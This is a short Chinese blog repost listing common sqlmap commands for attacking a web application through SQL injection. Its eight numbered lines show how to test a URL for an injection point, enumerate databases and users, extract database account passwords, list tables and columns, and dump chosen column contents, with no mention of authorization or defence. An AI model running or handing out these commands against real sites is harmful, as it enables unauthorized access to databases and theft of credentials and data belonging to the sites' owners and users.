sqlmap常用注入点检测&爆破命令

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

1、检测注入点是否可用
python sqlmap.py -u "url"
2、从目标url爆破所有数据库名
python sqlmap.py -u "url" --dbs
3、从目标url爆破当前数据库名
python sqlmap.py -u "url" --current-dbs
4、列出数据库所有用户
python sqlmap.py -u "url" --users
5、列出数据库账户密码
python sqlmap.py -u "url" --passwords
6、列出指定数据库的所有表名
python sqlmap.py -u "url" -D databasename --tables
7、列出指定表的所有字段名
python sqlmap.py -u "url" -D databasename -T tablename --columns --hex
8、列出指定字段内容
python sqlmap.py -u "url" -D databasename -T tablename -C columnname --dump

 

参考文献:https://www.freebuf.com/sectool/164608.html

转载于:https://my.oschina.net/u/3636678/blog/2872803

你可能感兴趣的:(sqlmap常用注入点检测&爆破命令)